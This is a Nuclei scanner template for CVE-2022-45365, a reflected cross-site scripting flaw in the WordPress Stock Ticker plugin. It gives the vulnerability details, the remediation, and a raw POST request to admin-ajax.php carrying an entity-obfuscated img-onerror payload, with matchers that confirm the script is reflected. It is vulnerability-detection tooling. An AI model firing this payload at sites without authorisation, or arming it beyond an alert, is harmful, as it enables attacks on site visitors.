nuclei-templates/http/cves/2022/CVE-2022-45365.yaml

54 lines
2.2 KiB
YAML

id: CVE-2022-45365
info:
name: Stock Ticker <= 3.23.2 - Cross-Site-Scripting
author: theamanrawat
severity: medium
description: |
The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
remediation: Fixed in version 3.23.3
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3232-reflected-cross-site-scripting-in-ajax-stockticker-symbol-search-test
- https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability
- https://wordpress.org/plugins/stock-ticker/
- https://nvd.nist.gov/vuln/detail/CVE-2022-45365
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-45365
cwe-id: CWE-79
metadata:
verified: "true"
max-request: 1
publicwww-query: "/wp-content/plugins/stock-ticker/"
tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Stock Ticker Fatal"
- "<IMG SRC=X ONERROR="
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a004630440220551f99c4f7c24a72cec95764b5d7e2b82a30fca070b2fdfa2501ea1c7d5a8bfc0220646804689406b49e700190614272ddda500f1ad274e7b8939a2e3589b17f0984:922c64590222798bb761d5b6d8e72950